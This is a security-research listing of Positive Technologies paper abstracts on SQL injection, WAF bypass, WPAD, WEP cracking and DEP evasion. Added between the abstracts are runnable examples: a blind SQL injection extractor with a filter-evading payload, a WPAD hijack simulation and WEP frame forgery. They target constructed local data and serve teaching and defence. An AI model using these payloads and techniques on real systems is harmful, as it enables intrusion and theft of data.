Analytics
Research and reviews by Positive Technologies experts
2010

Many years of assessment practice at the PT Research analytic center and Positive Technologies' experience in penetration testing and information security auditing show that errors in web application protection are still among the most common information security shortcomings. This paper collects and examines the quickest methods of exploiting blind SQL Injection (error-based), illustrated with examples for several widespread databases.
2009

According to the analysis of Positive Technologies experts, SQL Injection is the most widespread server-side vulnerability class in web applications. Exploits for it have changed considerably and have become much easier to use, so attackers widely use these vulnerabilities to infect web applications with malicious code automatically. This article examines in detail how SQL Injection can be used to compromise a web application and/or the system as a whole, including bypassing application security filters and Web Application Firewalls (WAF). It also covers the most current SQL Injection exploitation methods and gives recommendations on protecting your system.

The Web Application Security Consortium (WASC) is pleased to announce the WASC Web Application Security Statistics Project 2008. This initiative is a collaborative, industry-wide effort to pool sanitized website vulnerability data and to gain a better understanding of the web application vulnerability landscape.

There is no doubt that WAFs are deployed with the desire to reduce the existing risk of attacks that exploit vulnerabilities in web applications. The developers of such filters promise that this is the simplest and cheapest solution to "all problems", while administrators sincerely believe (for the umpteenth time) that their systems are impregnable. This paper shows, however, that a WAF is not the long-awaited "silver bullet". Like everything made by humans, a WAF has its weaknesses, which allow vulnerabilities to be exploited even on the most secure servers.
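The 2010 paper above is about error-based blind SQL Injection and the 2009 entries about exploitation and filter bypass. The following is an added illustration written for this listing, not code from any Positive Technologies paper: a SQLite-backed lookup built by string concatenation next to its parameterized form, an error oracle (SQLite cannot echo data in its error text the way the MySQL/MSSQL tricks in the paper do, so this is the slower one-bit-per-request variant that bisects each character), and a made-up signature filter that an inline-comment payload walks past. The schema, data, filter patterns and handler names are all constructed.

```python
"""Error-based blind SQL injection against a SQLite-backed lookup, plus a
naive signature filter and the inline-comment trick that gets past it.
Added illustration, not code from the Positive Technologies papers."""
import re
import sqlite3


def make_db():
    """Constructed sample schema and data."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT, secret TEXT)")
    conn.execute("INSERT INTO users (name, secret) VALUES ('alice', 'S3cr3t!')")
    return conn


# Hypothetical signature filter: blocks "' OR " and a trailing SQL comment.
NAIVE_SIGNATURES = [re.compile(r"'\s+or\s+", re.I), re.compile(r"--\s")]


def naive_waf_blocks(user_input):
    return any(p.search(user_input) for p in NAIVE_SIGNATURES)


def lookup_vulnerable(conn, name, waf=False):
    """Vulnerable handler: the input is pasted into the SQL text. Returns the
    three responses an attacker can tell apart: 'blocked', 'error' (verbose
    error page) or 'ok'."""
    if waf and naive_waf_blocks(name):
        return "blocked"
    try:
        conn.execute(f"SELECT id FROM users WHERE name = '{name}'").fetchall()
        return "ok"
    except sqlite3.Error:  # e.g. 'integer overflow' raised by the probe
        return "error"


def lookup_safe(conn, name, waf=False):
    """Hardened handler: a bound parameter can never become SQL."""
    try:
        conn.execute("SELECT id FROM users WHERE name = ?", (name,)).fetchall()
        return "ok"
    except sqlite3.Error:
        return "error"


# SQLite raises 'integer overflow' for abs() of the smallest int64; written
# as MAX-1 so it stays an integer however the literal is tokenized.
ERR = "abs(-9223372036854775807-1)"


def build_payload(condition, evade=False):
    probe = f"CASE WHEN ({condition}) THEN {ERR} ELSE 0 END"
    if not evade:
        return f"x' OR {probe} -- "
    # /**/ stands in for the whitespace the signature expects, and the
    # application's closing quote is matched instead of commented out.
    return f"x'/**/OR/**/{probe}/**/OR/**/''='"


def oracle(conn, lookup, condition, waf, evade, counter):
    """True iff the condition holds server-side (the error page came back).
    The CASE runs per row, so the table must hold at least one row."""
    counter[0] += 1
    return lookup(conn, build_payload(condition, evade), waf=waf) == "error"


def extract(conn, lookup, expr, waf=False, evade=False, max_len=32):
    """Recover the value of a SQL expression one character at a time,
    bisecting over ASCII code points (7 requests per character plus one
    length check). Returns (value, number_of_requests)."""
    counter = [0]
    value = ""
    for pos in range(1, max_len + 1):
        if not oracle(conn, lookup, f"length(({expr})) >= {pos}", waf, evade, counter):
            break
        lo, hi = 0, 127
        while lo < hi:
            mid = (lo + hi) // 2
            cond = f"unicode(substr(({expr}), {pos}, 1)) > {mid}"
            if oracle(conn, lookup, cond, waf, evade, counter):
                lo = mid + 1
            else:
                hi = mid
        value += chr(lo)
    return value, counter[0]


SECRET = "(SELECT secret FROM users WHERE name = 'alice')"

if __name__ == "__main__":
    db = make_db()
    print(extract(db, lookup_vulnerable, SECRET))                        # ('S3cr3t!', 57)
    print(extract(db, lookup_vulnerable, SECRET, waf=True))              # ('', 1): signature fires
    print(extract(db, lookup_vulnerable, SECRET, waf=True, evade=True))  # ('S3cr3t!', 57)
    print(extract(db, lookup_safe, SECRET))                              # ('', 1)
```

The request count is the point of the 2010 paper: seven characters cost 57 requests here, whereas the database-specific error-based methods it describes bring a whole value out in one request. The filter bypass shows why the 2009 WAF paper treats signatures as a speed bump rather than a fix: the parameterized handler is the only one of the two that never returns the error page.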
If we consider the PCI DSS compliance management process in terms of vulnerability assessment and compliance management systems, it is possible to identify a number of requirements that such systems address directly or indirectly.

While reviewing the monthly updates from Microsoft, my attention was drawn to bulletin MS09-008, or more precisely to its part about WPAD. The bulletin fixes a number of vulnerabilities in the Microsoft DNS and WINS services, including the "WPAD Registration Vulnerability", but this is not the first time WPAD has appeared in a security bulletin. WPAD weaknesses were first announced in 1999, and a wide range of problems closely associated with the WPAD technology was published in 2007; in the same year Chris Paget demonstrated exploits of WPAD vulnerabilities at ShmooCon 2007. Now, ten years later, Microsoft is publishing patches for WPAD flaws, but the question of security in networks where WPAD is used remains open. A successful attack on WPAD gives the attacker full access to the user's data sent to the Internet, which allows stealing critical data such as passwords or credit card numbers. The potential danger of WPAD depends on two factors: default configuration and weak awareness among users. In this article we discuss the WPAD architecture and its operating principles in home and corporate networks, give real examples of attacks, and provide recommendations for ordinary users and system administrators that reduce the consequences of an attack.
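To make the "default configuration" factor of the WPAD article above concrete, here is an added example (written for this listing, not code from the article or from Microsoft) that simulates the search a client performs: DHCP option 252, then DNS name devolution, then the flat name WPAD via NetBIOS/LLMNR. The hostnames, addresses and name tables are constructed; the block list in `register_name` is a simplified stand-in for the kind of control MS09-008 added for the wpad and isatap names, not a reproduction of Microsoft's implementation.

```python
"""Simulation of a client's WPAD search against constructed name tables,
showing which names an attacker on the network can claim and what
preempting them looks like. Added example; all names and addresses are made up."""

DHCP_WPAD_OPTION = 252  # DHCP option that carries a PAC URL


def devolve_candidates(client_fqdn, org_domain=None):
    """Names the client asks DNS for, from its own domain upward.

    Without an organisation boundary the search stops when two labels are
    left, the post-1999 rule (the original bug went all the way to wpad.com).
    Under suffixes such as co.nz that rule still sends a query outside the
    organisation; org_domain pins the stop point."""
    labels = client_fqdn.lower().strip(".").split(".")[1:]  # drop the host label
    names = []
    while len(labels) >= 2:
        domain = ".".join(labels)
        names.append("wpad." + domain)
        if domain == org_domain:
            break
        labels = labels[1:]
    return names


def discover_wpad(client_fqdn, dhcp_options, dns, netbios, org_domain=None):
    """First hit wins, in the order a Windows client tries the sources.
    Returns (source, pac_url) or (None, None)."""
    if DHCP_WPAD_OPTION in dhcp_options:
        return "dhcp", dhcp_options[DHCP_WPAD_OPTION]
    for name in devolve_candidates(client_fqdn, org_domain):
        if name in dns:
            return "dns:" + name, f"http://{name}/wpad.dat"
    if "WPAD" in netbios:  # flat-name fallback: any host on the segment can answer
        return "netbios", f"http://{netbios['WPAD']}/wpad.dat"
    return None, None


BLOCKED_LABELS = ("wpad", "isatap")


def register_name(table, name, address, blocked=BLOCKED_LABELS):
    """Dynamic registration that refuses the two well-known proxy/tunnel
    names (simplified model of the MS09-008 controls). True if added."""
    if name.lower().split(".")[0] in blocked:
        return False
    table[name.lower()] = address
    return True


def scenario():
    """Unprepared network: no option 252, no wpad record, so the attacker's
    answer for the flat name WPAD is used. Prepared network: the admin has a
    static wpad record and the attacker's dynamic update is refused."""
    dns = {"dc1.corp.example.com": "10.0.0.1"}
    attacker = {"WPAD": "10.0.0.66"}  # attacker answering NetBIOS/LLMNR queries
    before = discover_wpad("pc1.corp.example.com", {}, dns, attacker)
    dns["wpad.corp.example.com"] = "10.0.0.5"  # admin's static record
    refused = not register_name(dns, "wpad.corp.example.com", "10.0.0.66")
    after = discover_wpad("pc1.corp.example.com", {}, dns, attacker)
    return before, refused, after


if __name__ == "__main__":
    print(devolve_candidates("pc1.dept.corp.example.com"))
    print(devolve_candidates("pc1.acme.co.nz"))
    print(scenario())
```

Two things to take from running it: every name in the devolution list that nobody owns is a name an attacker can try to own, and the cheapest fix is the one the article's recommendations point at, namely making sure the legitimate answer (DHCP option 252 or a real wpad record) exists before an attacker supplies one.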
2008

The Web Application Security Consortium (WASC) is pleased to announce the WASC Web Application Security Statistics Project 2007. This initiative is a collaborative, industry-wide effort to pool sanitized website vulnerability data and to gain a better understanding of the web application vulnerability landscape.

2007

The MaxPatrol team has shown that attacks on WiFi clients can recover WEP keys without any interaction with the access point. Wep0ff is a new tool for cracking a WEP key without access to the AP by mounting a fake access point attack against WEP-based wireless clients. It uses a combination of fragmentation and evil twin attacks to generate traffic that can be used for KoreK-style WEP key recovery. The tool targets WEP clients that are probing for their AP: it waits for a client to connect to our "fake" access point, then intercepts either a gratuitous ARP (IPv4) or an ICMPv6 Neighbor Solicitation (IPv6) packet, slightly modifies it and sends it back. If the target machine answers our packet, we resend it in an endless loop.

2006

Wireless intrusion detection systems (WIDS) are not yet as popular as their wired counterparts, but current trends suggest that their number is set to grow. Positive factors here are the integration of such products with active network equipment and management's awareness of the risks associated with the unauthorized use of wireless devices. This awareness has led to an increase in the number of WIDS installations, even where wireless networks are not used. In this situation, security specialists need to evaluate not only the quality features of a product but also to predict any negative influence its implementation may have on the security of the corporate network.
This article looks at the results of research into wireless intrusion detection systems from the point of view of an application security specialist. Design faults discovered are not discussed, as their correction requires significant effort on the manufacturer's part.

2005

In October 2004 the MaxPatrol team discovered that it is possible to defeat the Microsoft Windows XP SP2 heap protection and Data Execution Prevention (DEP) mechanisms. As a result it is possible to achieve:
1) arbitrary write access to a memory region (of 1016 bytes or less);
2) arbitrary code execution;
3) DEP bypass.
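The Wep0ff entry in the 2007 section above ("intercepts a gratuitous ARP ..., slightly modifies it and sends it back") rests on one property of WEP: a known plaintext XORed with its ciphertext yields the RC4 keystream for that IV, and the keystream can then encrypt any other frame of the same or shorter length without the key. The block below is an added example written for this listing, not Wep0ff's code: it models a 64-bit WEP frame, recovers the keystream from a predictable gratuitous ARP and forges an ARP request the victim will accept. The key, IV, MAC and IP addresses are constructed, and the fake-AP and fragmentation steps the tool uses to obtain the ciphertext are not reproduced.

```python
"""WEP keystream reuse: recover the per-IV keystream from a known plaintext
(a client's gratuitous ARP) and forge a different frame under the same IV.
Added example with constructed key and addresses; not Wep0ff's own code."""
import struct
import zlib

LLC_SNAP_ARP = bytes.fromhex("aaaa030000000806")  # 802.2 LLC/SNAP header for ARP


def rc4(key, length):
    """Plain RC4 keystream generator (KSA followed by PRGA)."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    while len(out) < length:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def icv(data):
    """WEP integrity check value: CRC-32 of the plaintext, little-endian."""
    return struct.pack("<I", zlib.crc32(data) & 0xFFFFFFFF)


def wep_encrypt(key, iv, plaintext):
    """frame = IV || (plaintext || ICV) XOR RC4(IV || key)."""
    body = plaintext + icv(plaintext)
    return iv + bytes(a ^ b for a, b in zip(body, rc4(iv + key, len(body))))


def wep_decrypt(key, frame):
    """Plaintext if the ICV checks, else None (the receiver drops the frame)."""
    iv, body = frame[:3], frame[3:]
    pt = bytes(a ^ b for a, b in zip(body, rc4(iv + key, len(body))))
    data = pt[:-4]
    return data if icv(data) == pt[-4:] else None


def recover_keystream(frame, known_plaintext):
    """Ciphertext XOR (known plaintext || its ICV) = keystream for this IV."""
    known = known_plaintext + icv(known_plaintext)
    return frame[:3], bytes(a ^ b for a, b in zip(frame[3:], known))


def forge(iv, keystream, new_plaintext):
    """Encrypt a different packet under the same IV without knowing the key."""
    body = new_plaintext + icv(new_plaintext)
    if len(body) > len(keystream):
        raise ValueError("keystream too short for this packet")
    return iv + bytes(a ^ b for a, b in zip(body, keystream))


def arp_frame(sender_mac, sender_ip, target_ip):
    """LLC/SNAP + ARP request; sender IP == target IP makes it gratuitous."""
    return LLC_SNAP_ARP + struct.pack("!HHBBH6s4s6s4s", 1, 0x0800, 6, 4, 1,
                                      sender_mac, sender_ip, b"\x00" * 6, target_ip)


def is_gratuitous_arp(plaintext):
    if plaintext[:8] != LLC_SNAP_ARP or len(plaintext) < 36:
        return False
    _, ptype, _, _, op, _, spa, _, tpa = struct.unpack("!HHBBH6s4s6s4s", plaintext[8:36])
    return ptype == 0x0800 and op in (1, 2) and spa == tpa


# Constructed values: the WEP key is what the attacker does NOT know.
KEY = bytes.fromhex("0102030405")
CLIENT_MAC = bytes.fromhex("001122334455")
CLIENT_IP = bytes([192, 168, 1, 10])
ATTACKER_MAC = bytes.fromhex("66778899aabb")
ATTACKER_IP = bytes([192, 168, 1, 1])


def demo():
    """Victim announces itself with a gratuitous ARP; attacker turns that
    frame into an ARP request for the victim's address that the victim will
    decrypt and answer, producing more encrypted traffic for key recovery."""
    announce = arp_frame(CLIENT_MAC, CLIENT_IP, CLIENT_IP)
    captured = wep_encrypt(KEY, b"\x11\x22\x33", announce)      # seen by the fake AP
    iv, keystream = recover_keystream(captured, announce)        # plaintext is predictable
    probe = arp_frame(ATTACKER_MAC, ATTACKER_IP, CLIENT_IP)      # "slightly modified"
    forged = forge(iv, keystream, probe)
    return is_gratuitous_arp(announce), wep_decrypt(KEY, forged) == probe
```

Every forged frame reuses one IV, which is exactly what a WEP receiver tolerates and why an attacker who never learns the key can still provoke as many encrypted answers as the KoreK attack needs.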